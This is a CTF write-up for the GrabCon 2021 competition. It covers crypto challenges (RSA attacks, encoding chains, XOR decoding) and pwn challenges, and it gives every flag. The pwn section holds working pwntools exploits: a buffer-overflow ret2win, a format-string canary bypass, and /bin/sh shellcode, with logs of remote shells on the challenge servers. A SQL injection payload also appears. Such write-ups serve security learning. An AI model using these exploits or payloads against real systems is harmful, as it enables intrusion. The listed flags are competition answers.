# GrabCon 21 - CTF Community # Misc ``` Welcome 50 GrabCON{welcome_to_grabcon_2021} ``` ## Eazy-Peazy ``` E4sy Pe4sy 100 Hack admin user! Link Author: r3curs1v3_pr0xy ``` ' or 1=1;# ' **GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}** # Crypto ## Warm-up ``` Warm-up 50 Mukesh used to drink and then smoke 5 times a day. He is now suffering from cancer his drink was 64 rupees and 32 rupees cigarette that costs too cheap for him. And he has this much of cancer now. Author: Offen5ive ``` The hints (5 times, 64, 32) point to five rounds of alternating base64 and base32 decoding, which is exactly the CyberChef recipe below. ``` https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=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 ``` GrabCON{dayuum_s0n!} ## Pokeball RSA ``` Poke Ball RSA 100 Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena. 
Author: RDxR10 ``` ``` n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319 e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799 c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818 ``` Note that e is nearly as large as n, which points to a small private exponent d; the script below runs Wiener's attack, walking the continued-fraction convergents of e/n and trying each denominator as d until a valid RSA key can be constructed. ``` #https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319 E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799 c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818 print((E,N)) 
from sympy.core import Rational from sympy.ntheory.continued_fraction import continued_fraction_convergents from sympy.ntheory.continued_fraction import continued_fraction_iterator from Crypto.PublicKey import RSA import binascii it = continued_fraction_convergents(continued_fraction_iterator(Rational(E,N))) res=[] for i in range(1000): elt = next(it) if str(elt).find("/")>-1: d=int(str(elt).split("/")[1]) print(".",sep="",end="",flush=True) try: key = RSA.construct((N,E,d)) print("================") print(d) break except: pass pt=hex(pow(c,d,N)) print(pt) print(binascii.unhexlify(pt[2:])) ``` ``` b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329' ``` ``` import gmpy from Crypto.Util.number import * e=2 ct=9019127052844164572606928250741960583163943438936945828390420331200602392329 ct= gmpy.root(ct,e)[0] import binascii print(binascii.unhexlify(hex(ct)[2:])) ``` ## Not RSA - First Blood ``` Not RSA 440 Whatever it is, it's not RSA. Author: RDxR10 ``` ![](https://i.imgur.com/wUr2g9u.png) ``` from math import sqrt import random from Crypto.Util.number import bytes_to_long,long_to_bytes N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721 c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913 a = int(sqrt(N) + 1) b = random.randint(0,9999999999) #flag = b"REDACTED" #m = bytes_to_long(flag) #c = ((a**m)*(b**(a-1)))%((a-1)*(a-1)) p=194545307101606186694882845905355574989 q=253593527157826835431576067999755840801 r=pow(c,pow(p*q,-1,(p-1)*(q-1)),p*q) m=((((c*pow(r,-p*q,N))-1)%N)//(p*q))%N print(hex(m)) print(long_to_bytes(m)) #GrabCON{i75_p4ill13r_f0lks} ``` **GrabCON{i75_p4ill13r_f0lks}** ## Old Monk's Password ``` Old Monk's Password 150 Monk: What's this man? One password, different encoded forms? 
Author: RDxR10 ``` ``` enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>' enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>' enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;' import codecs import random class pass_w: x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm" def encode(self, text, i = -1): if i < 0 or i > len(self.x) + 1: i = random.randint(0, len(self.x) + 1) out = chr(i) for c in text: out += chr(ord(c) ^ ord(self.x[i])) i = (i + 1)%79 return codecs.encode(out) #y = pass_w() #print(y.encode("REDACTED")) #Enclose password within GrabCON{} def decode(enc): x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm" i = enc[0] print(i) out="" for c in enc[1:]: out += chr(c ^ ord(x[i])) i = (i + 1)%79 print(out) print(decode(enc)) ``` **GrabCON{817letmein40986728ilikeapples}** # Pwn ## Easy bin ``` from pwn import * # Read Service proc = ELF("./easybin") print(proc.symbols) # magie magie = p64(proc.symbols["vuln"]) for i in range(56,57): # lockpick print(i) pl=b"a"*i+magie print(pl) # Execute try: exec=process("./easybin") exec.sendline(pl) #print(exec.read(1024)) exec.interactive() #print(exec.poll()) exec.close() except: pass exploit=True if exploit: conn = remote('35.205.161.145','49153') #pl=b"a"*i+magie #print(conn.recv()) conn.sendline(pl) conn.interactive() conn.close() ``` ``` [*] '/home/kali/Desktop/grabcon/pwn/easybin' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments {'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 
4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728} 56 b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00' [+] Starting local process './easybin': pid 37201 [*] Switching to interactive mode $ exit [*] Got EOF while reading in interactive $ quit [*] Process './easybin' stopped with exit code 0 (pid 37201) [*] Got EOF while sending in interactive [+] Opening connection to 35.205.161.145 on port 49153: Done [*] Switching to interactive mode $ ls easybin flag.txt run.sh ynetd $ cat flag.txt GrabCON{w3ll_Y0u_Kn0w_Basics!!!} ``` ## Can you ? leak the canary ? 
``` from pwn import * import time # Read Service proc = ELF("./cancancan") print(proc.symbols) # magie magie = p32(proc.symbols["win"]) for i in range(25,26): # Iteration print(i) # Execute try: exec=process("./cancancan") exec.sendline(b"%31$x") canary = int(b"0x"+exec.recv(1024).split(b"\n")[1],16) pl = b"aaaa"*i+p32(canary)+magie*4 exec.sendline(pl) exec.interactive() #print(exec.poll()) exec.close() except: pass exploit=True if exploit: conn = remote('35.246.42.94','31337') conn.sendline(b"%31$x") time.sleep(1) canary = int(b"0x"+conn.recv(1024).split(b"\n")[1],16) print(canary) pl = b"aaaa"*i+p32(canary)+magie*4 conn.sendline(pl) conn.interactive() conn.close() pass # GrabCON{Byp4ss_can4ry_1s_fun!} ``` **GrabCON{Byp4ss_can4ry_1s_fun!}** ## Pwn CTF Shellcode on the stack, ``` from pwn import * import time for i in range(302,303): print(i) conn = remote("35.246.42.94","1337")#process("./pwn2") time.sleep(2) stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1],16) print(hex(stack)) #pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x40\x89\xc3\xcd\x80"#b"\x90"*100+b"\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x6D\x20\x2B\x2C\x6D\x6D\x31\x2A\x48\xB8\x42\x42\x42\x42\x42\x42\x42\x42\x48\x31\xC3\x53\x54\x5F\x48\x31\xC0\xB0\x3B\x0F\x05" pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80" conn.sendline(pl) time.sleep(1) try: #print(conn.recv()) conn.interactive() except: conn.close() conn.close() input() #conn.interactive() ``` ``` kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py 302 [+] Opening connection to 35.246.42.94 on port 1337: Done 0xffe7d4be [*] Switching to interactive mode $ $ ls bin dev flag.txt lib lib32 lib64 pwn2 $ cat flag.txt GrabCON{Y0U_g0t_Sh3ll_B4asics} $ ``` **GrabCON{Y0U_g0t_Sh3ll_B4asics}** That's all folks - Electro